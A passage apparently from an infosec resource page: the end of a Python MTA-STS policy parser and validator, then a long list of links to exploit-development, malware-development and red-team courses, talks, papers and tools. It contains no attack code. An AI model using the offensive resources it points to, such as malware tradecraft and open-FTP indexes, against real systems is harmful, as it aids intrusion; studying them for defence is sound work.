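    (the format allows extension fields); other duplicates are errors."""
    policy = {"mx": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed policy line: {raw!r}")
        key, value = key.strip(), value.strip()
        if key == "mx":
            policy["mx"].append(value.lower())
        elif key in ("version", "mode", "max_age"):
            if key in policy:
                raise ValueError(f"duplicate field {key}")
            policy[key] = value
    return policy


def validate_policy(policy: dict):
    """Return a list of problems; empty means the policy is usable."""
    problems = []
    if policy.get("version") != "STSv1":
        problems.append("version must be STSv1")
    if policy.get("mode") not in VALID_MODES:
        problems.append("mode must be enforce, testing or none")
    try:
        age = int(policy.get("max_age", ""))
        if not 0 <= age <= MAX_AGE_LIMIT:
            problems.append("max_age out of range")
    except ValueError:
        problems.append("max_age must be an integer")
    if policy.get("mode") != "none" and not policy["mx"]:
        problems.append("at least one mx is required")
    return problems


def mx_matches(mx_host: str, pattern: str) -> bool:
    """Exact match, or '*.' wildcard standing for exactly one leftmost label."""
    mx_host = mx_host.lower().rstrip(".")
    pattern = pattern.lower().rstrip(".")
    if pattern.startswith("*."):
        suffix = pattern[1:]                      # ".example.net"
        return mx_host.endswith(suffix) and "." not in mx_host[:-len(suffix)]
    return mx_host == pattern


# Constructed records for example.com.
SAMPLE_TXT = "v=STSv1; id=20190101T000000Z"
SAMPLE_POLICY = """\
version: STSv1
mode: enforce
mx: mail.example.com
mx: *.example.net
max_age: 604800
"""

if __name__ == "__main__":
    print(parse_sts_txt(SAMPLE_TXT))
    pol = parse_policy(SAMPLE_POLICY)
    print(pol, validate_policy(pol) or "policy OK")
    for host in ("mx1.example.net", "a.b.example.net", "example.net"):
        print(host, any(mx_matches(host, p) for p in pol["mx"]))
```

Before switching `mode` from `testing` to `enforce`, check that every MX the domain publishes matches a pattern here and presents a certificate valid for its name; with TLSRPT configured, the `testing` period is where those mismatches show up as reports instead of bounced mail.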
- Automatic SSL with Now and Let's Encrypt
- Hacking Digital Calipers
- Binary Hardening in IoT products: Last year, the team at CITL looked into the state of binary hardening features in IoT firmware.
- ZigDiggity: A ZigBee hacking toolkit by Bishop Fox.
- Bolstering Security with Cyber Intelligence
- Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties
- THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS
- Explanatory Report to the Additional Protocol to the Convention on Cybercrime
- PAN-OS GlobalProtect Portal Scanner: Determine the Palo Alto PAN-OS software version of a remote GlobalProtect portal or management interface.
- Thomas Roccia's #100DaysOfCode challenge: IDA Pro and a lot of other things.
- Audi A7 2014 MMI Mishandles the Format-string Specifiers
- (pt-br) BoF + Sockets + Coding Errors with Python3
- AWAE/OSWE: OSWE Preparation.
- AWAE-PREP: This repository will serve as the "master" repo containing all trainings and tutorials done in preparation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses.
- offsec_WE: learning case to prepare OSWE
- AWAE-Preparation: This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE.
- From AWAE to OSWE: The Preparation Guide
- AWAE/OSWE: Preparation for coming AWAE Training.
- Security Certification Progress Chart
- study material used for the 2018 CISSP exam, site
- JustTryHarder: a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings).
- Hacking Your Pen Testing / Red Teaming Career: Part 1
- PentesterAcademy: Courses and Online Labs.
- OSCE-exam-practice, OSCE Exam Practice - Part IX (LTER via SEH Overwrite w/ Restricted Character Set)
- RED TEAM Operator: Malware Development Essentials Course and RED TEAM Operator: Malware Development Intermediate Course
- Black Hat 2014 Keynote: Cybersecurity as Realpolitik, amazing keynote by Dan Geer (Geertinho)
- Security Guidelines for Congressional Campaigns
- From Assembly to JavaScript and back (OffensiveCon2018)
- Kudelski Security's 2018 pre-Black Hat crypto challenge
- Black Hat 2018: Expert demonstrated a new PHP code execution attack
- [DEFCON 2018] Doublethink: 8-Architecture Assembly Polyglot by Robert Xiao
- ARM-based IoT Exploit Development
- (pt-br) An Introduction to Threat Intelligence and Threat Hunting for Companies Without an Infinite Budget
- Outflank Presentations
- The Art of De-obfuscation
- H2HC - Hackers To Hackers Conference:
- H2HC 2017: H2HC 2017 Slides/Materials/Presentations
- H2HC 2018: Slides/Materials/Presentations
- JavaDeserH2HC: Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).
- SBSeg 2018: Brazilian Symposium on Information and Computational Systems Security (Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais, SBSeg)
- Smartphone Privacy: How Your Smartphone Tracks Your Entire Life
- Fun with LDAP and Kerberos- in AD environments
- Analysis and recommendations for standardization in penetration testing and vulnerability assessment
- The Second Crypto War—What's Different Now (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University)
- Objective by the Sea (2018):
- APFS Internals - Jonathan Levin
- Protecting the Garden of Eden - Patrick Wardle
- Code signing flaw in macOS - Thomas Reed
- From Apple Seeds to Apple Pie - Sarah Edwards
- When Macs Come Under ATT&CK - Richie Cyrus
- Crashing to Root - Brandon Azad
- Leveraging Apple's Game Engine for Advanced Threat Detection - Josh Stein / Jon Malm
- MacDoored - Jaron Bradley
- Who Moved my Pixels? - Mikhail Sosonkin
- Aliens Among Us - Michael Lynn
- BlackHoodie 2018 Workshop: An Introduction To Binary Exploitation
- Malware: Anti-forensics
- The 35C3 halfnarp
- SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
- Mojave's Sandbox is Leaky
- Code Obfuscation 10**2+(2*a+3)%2
- DeepState: Bringing vulnerability detection tools into the development lifecycle, paper: DeepState: Symbolic Unit Testing for C and C++
- Hardware Memory Tagging to make C/C++ memory safe(r)
- wallet.fail: Hacking the most popular cryptocurrency hardware wallets
- Reverse Engineering: Closed, heterogeneous platforms and the defenders' dilemma. Looking back at the last 20 years of RE and looking ahead at the next few. SSTIC 2018, Thomas Dullien ("Halvar Flake")
- Making C Less Dangerous in the Linux kernel
- Modchips of the State: Hardware implants in the supply-chain - CCC 2018
- Workshop-BSidesMunich2018: ARM shellcode and exploit development - BSidesMunich 2018
- REhint's Publications.
- INFILTRATE 2019 Demo Materials
- A Practical Approach to Purple Teaming
- The Advanced Threats Evolution: REsearchers Arms Race by @matrosov
- The Beginner Malware Analysis Course + VirusBay Access
- MISP Summit 05: MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone.
- ConPresentations by Maddie Stone.
- Venturing into the Dark- a review of Dark Side Ops 2: Adversary Simulation
- Expert voices disinvited from CyberCon
- Hack.lu 2019 Day #1 Wrap-Up
- 0x0g-2018-badge.
- DEFCON 2020: SAFEMODE, VILLAGES, BADGE, ics-forum
- Virtual Cybersecurity Conferences: An ongoing list of virtual cybersecurity conferences.
- The Open Source Security Software Hackathon by hack.lu
- The speaker and schedule data for GrayHat to populate Hacker Tracker and the main GrayHat website.
- r2con2020 stuff
- How to R&D hacking toys for fun & no-profit
- Offensive Development: Post-Exploitation Tradecraft in an EDR World x33fcon 2020
- WebSploit Labs workshop hosted by the Red Team Village during YASCON
- The AVAR International Conference is back!
- Japan Security Analyst Conference Virtual Edition
- SANS Virtual Summits Will Be FREE for the Community in 2021
Some good places to visit:
- hasherezade's 1001 nights
- List of Helpful Information Security Multimedia
- pocorgtfo: a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs.
- FIDO ECDAA Algorithm
- stamparm: Miroslav Stampar Repositories (a lot of good stuff)
- Github repos:
- Damn Vulnerable Web Application:
- Nelson Brito's Source: This repository is a collection of information, code and/or tool, which I've released and/or presented in some of the most notorious conferences, helping the audience to study and understand some cybersecurity related topics.
- (pt-br) PwnLab: init
- Mamont's open FTP Index: a lot of open FTPs!!!
- fuzz.txt: Potentially dangerous files
- Free Training: New Certified Learning Paths: The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings!
- (pt-br) Catálogo de Fraudes (Fraud Catalog): Launched in 2008 to alert the education and research community to the main scams circulating on the internet, our Fraud Catalog is today an important repository of messages classified as fraudulent, serving as a source of information for all of Brazil.
- Daily Information Security Podcast ("StormCast")
- Hackerrank: Contains codes for some of the solutions to Hacker-rank problems
- Spoilerwall introduces a brand new concept in the field of network hardening
- abusing github commit history for the lulz
- resist_oped: 🕵🏽♀️ Identifying the author behind the New York Times' op-ed from inside the Trump White House.
- InfoSec BS Bingo
- How to fit all of Shakespeare in one tweet (and why not to do it!)
- Attrition.org: defacement rank.
- rot8000: rot13 for the Unicode generation (github)
- Reverse Engineering Pokémon GO Plus: TL;DR; You can clone a Pokemon GO Plus device that you own. pgpemu: github repo.
- grugq quotes
- Pivots & Payloads Board Game: Introducing the NEW SANS Pen Test Poster by SANS Institute
- Chess Steganography
- Enigma, the Bombe, and Typex
- (pt-br) A cryptography icon of World War II, the Enigma machine has a surviving specimen in Brazil
- Enigma machine: This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit.
- How I hacked modern Vending Machines
- A better zip bomb
- Goodbye-World: The last program that every developer writes.
- Dumb Password Rules
- Enigma I, Navy M3/M4 Machine Emulator.
- FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases by Rob Rosenberger.
- (pt-br) pivoting
- Posters, drawings...
- "Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z"
- [1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier
- [1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem
- DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
- Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
- The Hunt for 3ve: Taking down a major ad fraud operation through industry collaboration.
- Page Cache Attacks: We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache.
- Identification and Illustration of Insecure Direct Object References and their Countermeasures
- China’s Maxim: Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking
- Listen to Your Key: Towards Acoustics-based Physical Key Inference
- Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption
- Everything Old is New Again: Binary Security of WebAssembly
- Discovering Suspicious APT Behaviors by Analyzing DNS Activities
- Harvard Belfer National Cyber Power Index 2020
- Quantum Blockchain using entanglement in time